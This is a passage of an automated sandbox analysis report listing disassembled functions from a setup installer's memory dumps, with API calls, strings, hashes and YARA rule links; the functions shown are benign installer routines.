                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ErrorH_prolog3Last
                                                              • String ID: Failed to record DisplayedLcidId$Failed to record InstallerVersion$Failed to record IsRetailBuild$Failed to record PackageName$Failed to record PackageVersion$Failed to record PatchType
                                                              • API String ID: 685212868-335235891
                                                              • Opcode ID: 893c1f7538201e616aa1acedb37c34dfb60e03080316e1dfd3d9d5b831d23cd9
                                                              • Instruction ID: f056c18a726afea679d1d3997e47e387643531eff37912dd74d71a9997ec17b8
                                                              • Opcode Fuzzy Hash: 893c1f7538201e616aa1acedb37c34dfb60e03080316e1dfd3d9d5b831d23cd9
                                                              • Instruction Fuzzy Hash: 57517172600209AFDB10DFA5C904ACA3BBABFA5358F108528F914DBB90CB70D615CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C950076 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C95007D
                                                              • GetSystemInfo.KERNEL32(?,02642228,02642228,02642228,02642228,00000050,6C9493A7,?,UserControlled,?,02642228,6C90A794,?,6C91BFC7,00000018,6C91BC3C), ref: 6C95010B
                                                              • SqmIsWindowsOptedIn.SQMAPI(?,UserControlled,?,02642228,6C90A794,?,6C91BFC7,00000018,6C91BC3C,0264224C,?,?,?,?,?,?), ref: 6C950121
                                                              • __CxxThrowException@8.LIBCMT ref: 6C9501CB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Exception@8H_prolog3InfoOptedSystemThrowWindows
                                                              • String ID: AlwaysUploaded$Disabled$OSControlled$ParameterInfo.xml$UserControlled$schema validation failure: Invalid Policy Value being defined.
                                                              • API String ID: 3692811390-1543467451
                                                              • Opcode ID: 3bb2760e8890fa4b472c0812bcbf212563fc91b14441571cabb86073cd85e931
                                                              • Instruction ID: 4adc0a245415f77316c8e59622f31498987ca08d766783ba5c1bbbc3d0c047ed
                                                              • Opcode Fuzzy Hash: 3bb2760e8890fa4b472c0812bcbf212563fc91b14441571cabb86073cd85e931
                                                              • Instruction Fuzzy Hash: 5E41B032904249DFCB14CBB8C851BDEB7B9AF2531CF444259E425EBA81DB30DA58C7A2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C94A2DD Relevance: 16.8, APIs: 5, Strings: 6, Instructions: 271COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 6C91C53D: GetLastError.KERNEL32(?,6C94A320,512AC3CC,?,?), ref: 6C91C55E
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C951236: __EH_prolog3.LIBCMT ref: 6C95123D
                                                              • GetLastError.KERNEL32 ref: 6C94A393
                                                              • GetLastError.KERNEL32 ref: 6C94A434
                                                              • GetLastError.KERNEL32 ref: 6C94A4A7
                                                              • GetLastError.KERNEL32 ref: 6C94A511
                                                              • GetLastError.KERNEL32 ref: 6C94A5A5
                                                              Strings
                                                              • Failed to record SetMachineId, xrefs: 6C94A461
                                                              • Failed to record StartupAppid, xrefs: 6C94A4C1
                                                              • Failed to record current state name, xrefs: 6C94A52B
                                                              • Failed to record MPC, xrefs: 6C94A5BB
                                                              • Failed to record StartSession, xrefs: 6C94A322
                                                              • Failed to record SetUserId, xrefs: 6C94A3C0
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$H_prolog3
                                                              • String ID: Failed to record MPC$Failed to record SetMachineId$Failed to record SetUserId$Failed to record StartSession$Failed to record StartupAppid$Failed to record current state name
                                                              • API String ID: 3502553090-2804495384
                                                              • Opcode ID: 6bff5bc9b6651ee5f4f81a6a379811538b463a9a9ec8b09c3b7e9143437f5c63
                                                              • Instruction ID: 823a59a1d9c4aceb0239b760e63c557bcf67450dcd8b76e0e4d67caa1d6d5bd4
                                                              • Opcode Fuzzy Hash: 6bff5bc9b6651ee5f4f81a6a379811538b463a9a9ec8b09c3b7e9143437f5c63
                                                              • Instruction Fuzzy Hash: FAA1A1712082429FD724CF65C844A9F7BE9FFA5368F104A2DF461C7AA1DB74D908CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C932127 Relevance: 16.1, APIs: 2, Strings: 7, Instructions: 317COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C93212E
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              • __CxxThrowException@8.LIBCMT ref: 6C932484
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8Throw
                                                              • String ID: CopyPackageFilesToDownloadLocation$DelayBetweenRetries$DownloadRetries$Items$No items found. The package must contain at least one item.$ParameterInfo.xml$true
                                                              • API String ID: 2489616738-2573507987
                                                              • Opcode ID: bcd00543d3d3a316ee565c9d8546d49a3a78f1ead21a13066430499c0d155afe
                                                              • Instruction ID: b775fcad42d54b3085cdab72e703710dcf88affa71e5b3416c5c496f2f97a8bd
                                                              • Opcode Fuzzy Hash: bcd00543d3d3a316ee565c9d8546d49a3a78f1ead21a13066430499c0d155afe
                                                              • Instruction Fuzzy Hash: F9D15170904259DFCF05CFA8C984AEEBBB9BF59308F148199E414EBB81C734DA05CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C6232BC Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 303COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 6C623302
                                                                • Part of subcall function 6C623679: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,6C62332F,?), ref: 6C623683
                                                                • Part of subcall function 6C623679: OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,?,?,6C62332F,?), ref: 6C6236B3
                                                                • Part of subcall function 6C623679: ConvertSidToStringSidW.ADVAPI32(00000000,?), ref: 6C6236D5
                                                                • Part of subcall function 6C623679: FindCloseChangeNotification.KERNEL32(?,?,00000001,?,?,?,?,6C62332F,?), ref: 6C6236E0
                                                              • EnterCriticalSection.KERNEL32(6C640168,?), ref: 6C623334
                                                              • LeaveCriticalSection.KERNEL32(6C640168,00000400,?), ref: 6C6233F5
                                                              • LocalFree.KERNEL32(00000000), ref: 6C62340C
                                                              • SetLastError.KERNEL32(00000057), ref: 6C62341F
                                                                • Part of subcall function 6C6217EB: malloc.MSVCRT ref: 6C6217F6
                                                              • ctype.LIBCPMT ref: 6C62EDDC
                                                                • Part of subcall function 6C62343E: GetSystemTime.KERNEL32(00000000,00000838,00000000), ref: 6C62347D
                                                                • Part of subcall function 6C62343E: SystemTimeToFileTime.KERNEL32(00000000,00000000), ref: 6C62348B
                                                                • Part of subcall function 6C6230D2: InterlockedIncrement.KERNEL32(00000000), ref: 6C6230D8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303901253.000000006C621000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C620000, based on PE: true
                                                              • Associated: 00000004.00000002.3303864433.000000006C620000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303946399.000000006C640000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303986988.000000006C641000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c620000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Time$CriticalProcessSectionSystem$ChangeCloseConvertCurrentEnterErrorFileFindFreeIncrementInterlockedLastLeaveLocalNotificationOpenStringTokenctypemallocmemset
                                                              • String ID: %s_%s$W
                                                              • API String ID: 1092980461-4070589124
                                                              • Opcode ID: 13b173f4bf0f9c2f039d2999e54be4e114c9c35bddabd93f60738ac9faf8ec7c
                                                              • Instruction ID: fd55c8f032ede8656e1e3107f3a0071ee8f79e14321923b3e7f27922a7d5e090
                                                              • Opcode Fuzzy Hash: 13b173f4bf0f9c2f039d2999e54be4e114c9c35bddabd93f60738ac9faf8ec7c
                                                              • Instruction Fuzzy Hash: C4C1D5319402689BDB619F25CC80BD977F8BF01749F10C4A4E999A7991CB79CA88CFDC
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C923BA9 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 263COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • CustomErrorHandling, xrefs: 6C923BFA
                                                              • ReturnCode, xrefs: 6C923CCA
                                                              • MSIErrorMessage, xrefs: 6C923D0D
                                                              • ParameterInfo.xml, xrefs: 6C923C67
                                                              • Adding Custom Code , xrefs: 6C923E02
                                                              • CustomErrorHandling element not defined, xrefs: 6C923BE1
                                                              • Processing CustomErrorHandling element block, xrefs: 6C923BF0
                                                              • schema validation failure: Expect at least one CustomError element., xrefs: 6C923C59
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: Adding Custom Code $CustomErrorHandling$CustomErrorHandling element not defined$MSIErrorMessage$ParameterInfo.xml$Processing CustomErrorHandling element block$ReturnCode$schema validation failure: Expect at least one CustomError element.
                                                              • API String ID: 431132790-2299275001
                                                              • Opcode ID: 8cbf2dee28b8b8055498cca5814bb7c5a1e6d19bcaa9414498c6e113fd1b359f
                                                              • Instruction ID: 1f274bd3cfe28f83be61cacf085c15ec4853048e71143af20898909814deb4da
                                                              • Opcode Fuzzy Hash: 8cbf2dee28b8b8055498cca5814bb7c5a1e6d19bcaa9414498c6e113fd1b359f
                                                              • Instruction Fuzzy Hash: 63B15771910249EFDB04CBB8C945BEEBBB8BF25318F144649E160ABB80D734DA09CB65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C947B40 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 95timethreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 6C947B4A
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              • GetCommandLineW.KERNEL32 ref: 6C947BB4
                                                              • _memset.LIBCMT ref: 6C947BF4
                                                              • GetTimeZoneInformation.KERNEL32(?), ref: 6C947C03
                                                              • GetThreadLocale.KERNEL32(00000007,?), ref: 6C947C3F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: CommandH_prolog3H_prolog3_InformationLineLocaleThreadTimeZone_memset
                                                              • String ID: CommandLine = %s$Environment details$Initial LCID = %u$TimeZone = %s
                                                              • API String ID: 1050886296-4009495903
                                                              • Opcode ID: 6f20c99fe89cc406d6c028af6dff3aefc06fa2713484d0846bd47623f475b1e2
                                                              • Instruction ID: 17735bf812bbd62984827bc45d7de5a4550906762ccf98d8b9d53cdd48ee96a9
                                                              • Opcode Fuzzy Hash: 6f20c99fe89cc406d6c028af6dff3aefc06fa2713484d0846bd47623f475b1e2
                                                              • Instruction Fuzzy Hash: 0D315C71901218EBEB20DBA4CC48FCDBBB9BF15309F14459AE108E7A90DB30DA48CF61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C938DBF Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 77windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C938DC6
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              • PathIsRelativeW.SHLWAPI(?,?,?,00000024,6C962414), ref: 6C938DE4
                                                              • PathFileExistsW.SHLWAPI(?), ref: 6C938E1F
                                                                • Part of subcall function 6C915D3F: __EH_prolog3.LIBCMT ref: 6C915D46
                                                                • Part of subcall function 6C915D3F: GetModuleFileNameW.KERNEL32(6C8F0000,00000010,00000104,?,6C94831D,00000000), ref: 6C915D93
                                                                • Part of subcall function 6C948E4A: PathAppendW.SHLWAPI(00000000,?,?,?,?,?,6C9599FD,00000000,00000000,?,?,?,00000000,?,UiInfo.xml), ref: 6C948E6E
                                                                • Part of subcall function 6C938EB8: CreateWindowExW.USER32(00000000,STATIC,00000000,0000000E,80000000,80000000,00000000,00000000,00000000,00000000,00000000), ref: 6C938F00
                                                                • Part of subcall function 6C938EB8: GetWindowLongW.USER32(?,000000F0), ref: 6C938F15
                                                                • Part of subcall function 6C938EB8: SetWindowLongW.USER32(?,000000F0,00000000), ref: 6C938F25
                                                                • Part of subcall function 6C938EB8: LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00000010), ref: 6C938F32
                                                                • Part of subcall function 6C938EB8: GetDesktopWindow.USER32 ref: 6C938F44
                                                                • Part of subcall function 6C938EB8: ShowWindow.USER32(?,00000001), ref: 6C938F57
                                                              • ShowWindow.USER32(?,00000005), ref: 6C938E4E
                                                              • UpdateWindow.USER32(?), ref: 6C938E57
                                                              • TranslateMessage.USER32(?), ref: 6C938E78
                                                              • DispatchMessageW.USER32(?), ref: 6C938E82
                                                              • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 6C938E8F
                                                              Strings
                                                              • Splash screen file '%s' not found, xrefs: 6C938E2F
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Window$H_prolog3Path$FileLongMessageShow$AppendCallbackCreateDesktopDispatchDispatcherExistsImageLoadModuleNameRelativeTranslateUpdateUser
                                                              • String ID: Splash screen file '%s' not found
                                                              • API String ID: 3262628749-2590370906
                                                              • Opcode ID: fa943dbb8826dfc4432888a0fb192a4afb10e7cb45874f5418b4c10d4cd7d7a1
                                                              • Instruction ID: 9da3e9b62a97c3b9637760c56d59a74fe53c8c63538ed7d114f4008a04a637bb
                                                              • Opcode Fuzzy Hash: fa943dbb8826dfc4432888a0fb192a4afb10e7cb45874f5418b4c10d4cd7d7a1
                                                              • Instruction Fuzzy Hash: 1421BF72A00219ABDF21ABB4CC04EDE7779BF25388F044516F421EBB90C734D914CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C91AC58 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 298memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C91AC5F
                                                              • SysFreeString.OLEAUT32(?), ref: 6C91AD66
                                                              • SysAllocString.OLEAUT32(-00000010), ref: 6C91AE70
                                                              • __CxxThrowException@8.LIBCMT ref: 6C91AF3F
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C948CD5: __EH_prolog3.LIBCMT ref: 6C948CDC
                                                                • Part of subcall function 6C91838A: __EH_prolog3.LIBCMT ref: 6C918391
                                                                • Part of subcall function 6C918415: __EH_prolog3.LIBCMT ref: 6C91841C
                                                              Strings
                                                              • schema validation failure: ExpressionAlias's Id not defined or defined too many times: , xrefs: 6C91AEBF
                                                              • ExpressionAlias, xrefs: 6C91ACAC, 6C91ADEA
                                                              • //*[@Id='%s'], xrefs: 6C91AD26
                                                              • schema validation failure: Invalid ExpressionAlias or Id not found: , xrefs: 6C91AF84
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$String$AllocException@8FreeThrow
                                                              • String ID: //*[@Id='%s']$ExpressionAlias$schema validation failure: ExpressionAlias's Id not defined or defined too many times: $schema validation failure: Invalid ExpressionAlias or Id not found:
                                                              • API String ID: 191698298-1025498756
                                                              • Opcode ID: 66aa7b67b5940a2a59b484065c4e42992d1e094a82cbf0230d33bde3acbed4f2
                                                              • Instruction ID: 554108c0aacf8cbf3740b32604d38d9d0ab83e80bb143cba495886d2264c6056
                                                              • Opcode Fuzzy Hash: 66aa7b67b5940a2a59b484065c4e42992d1e094a82cbf0230d33bde3acbed4f2
                                                              • Instruction Fuzzy Hash: DFC14B71904249EFCB00DFE4C984AEEBBB9BF65308F244559E011EBB81DB35DA49CB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C95D446 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 206COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3_catch.LIBCMT ref: 6C95D44D
                                                              • GetCommandLineW.KERNEL32(0000006C,6C95B3B6,?,00000738,6C94FA6E,?,6C90A794,02642228), ref: 6C95D48E
                                                                • Part of subcall function 6C913E77: __EH_prolog3.LIBCMT ref: 6C913E7E
                                                                • Part of subcall function 6C913A16: __EH_prolog3.LIBCMT ref: 6C913A1D
                                                              • CoInitialize.OLE32(00000000), ref: 6C95D4EF
                                                              • CoUninitialize.OLE32(?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C95D6A9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$CommandH_prolog3_catchInitializeLineUninitialize
                                                              • String ID: Hide$SplashScreen$UiInfo.xml$nosplashscreen
                                                              • API String ID: 1338294413-2964427009
                                                              • Opcode ID: f905cf2f81d66d958189d25e38bda9fd0aba5239e302c3d11de72feaa05eaee4
                                                              • Instruction ID: e0f48a19465fc8520b10c3ec918730da7261f273e23f8ce934a7c5a551b01db8
                                                              • Opcode Fuzzy Hash: f905cf2f81d66d958189d25e38bda9fd0aba5239e302c3d11de72feaa05eaee4
                                                              • Instruction Fuzzy Hash: 57819D71904248DBDF00DFE8C945BDEBBB8AF25308F144199E414EBB81CB35DA1ACBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C919C3A Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 174COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C919C41
                                                              • __CxxThrowException@8.LIBCMT ref: 6C919D24
                                                              • __fassign.LIBCMT ref: 6C919D58
                                                              • _wcstoul.LIBCMT ref: 6C919D65
                                                                • Part of subcall function 6C96B6D0: wcstoxl.LIBCMT ref: 6C96B6E0
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C91838A: __EH_prolog3.LIBCMT ref: 6C918391
                                                              • __get_errno.LIBCMT ref: 6C919D74
                                                              Strings
                                                              • ", xrefs: 6C919D88
                                                              • schema validation failure: empty value, %s, for %s, xrefs: 6C919CA1
                                                              • schema validation failure: non-numeric value, %s, for %s, xrefs: 6C919DB1
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8Throw__fassign__get_errno_wcstoulwcstoxl
                                                              • String ID: "$schema validation failure: empty value, %s, for %s$schema validation failure: non-numeric value, %s, for %s
                                                              • API String ID: 2631245360-326575430
                                                              • Opcode ID: 2ae485d946700e8011c273b5ff1a53c84027add438b5ae14e990a632680709f3
                                                              • Instruction ID: b8954a45a34eb9db4ae2e006c3ac2fb827ab60ed091d3f24cd360166ff3087bb
                                                              • Opcode Fuzzy Hash: 2ae485d946700e8011c273b5ff1a53c84027add438b5ae14e990a632680709f3
                                                              • Instruction Fuzzy Hash: 76618F71904149EFDF04DFE8C8859EEBBB8BF25318F14855AF011ABA81DB34DA09CB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C48DBFF Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 174comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C48DC06
                                                                • Part of subcall function 6C48D923: __EH_prolog3.LIBCMT ref: 6C48D92A
                                                                • Part of subcall function 6C48D923: PathIsRelativeW.SHLWAPI(00000000,00000000,?,00000000,00000008,6C49E271,00000000,?,?,00000DF0,?,?), ref: 6C48D960
                                                                • Part of subcall function 6C48D923: GetModuleFileNameW.KERNEL32(00000010,00000104,?,00000000,00000008,6C49E271,00000000,?,?,00000DF0,?,?), ref: 6C48D9BA
                                                                • Part of subcall function 6C48D923: PathCombineW.SHLWAPI(?,?,?,00000000,?,00000000,00000008,6C49E271,00000000,?,?,00000DF0,?,?), ref: 6C48DA0D
                                                              • CoCreateInstance.OLE32(6C487930,00000000,00000017,6C487970,?,?,?,?,00000030,6C4962D8), ref: 6C48DC48
                                                              • SysFreeString.OLEAUT32(?), ref: 6C48DC69
                                                                • Part of subcall function 6C49E8E8: __EH_prolog3.LIBCMT ref: 6C49E8EF
                                                                • Part of subcall function 6C48DE1D: __EH_prolog3.LIBCMT ref: 6C48DE24
                                                                • Part of subcall function 6C48DE1D: SysFreeString.OLEAUT32(00000000), ref: 6C48DE6B
                                                                • Part of subcall function 6C48CA39: __EH_prolog3.LIBCMT ref: 6C48CA40
                                                                • Part of subcall function 6C48CAC2: __EH_prolog3.LIBCMT ref: 6C48CAC9
                                                              • __CxxThrowException@8.LIBCMT ref: 6C48DD4B
                                                              • SysFreeString.OLEAUT32(?), ref: 6C48DD87
                                                                • Part of subcall function 6C48B93E: __EH_prolog3.LIBCMT ref: 6C48B945
                                                              Strings
                                                              • m_spDoc->get_documentElement() failed. Parse error is: %s, xrefs: 6C48DD19
                                                              • CoCreateInstance(__uuidof(DOMDocument30)) failed with hr=%d, xrefs: 6C48DC58
                                                              • m_spDoc->loadXML() failed. Parse error is: %s, xrefs: 6C48DDFE
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$FreeString$Path$CombineCreateException@8FileInstanceModuleNameRelativeThrow
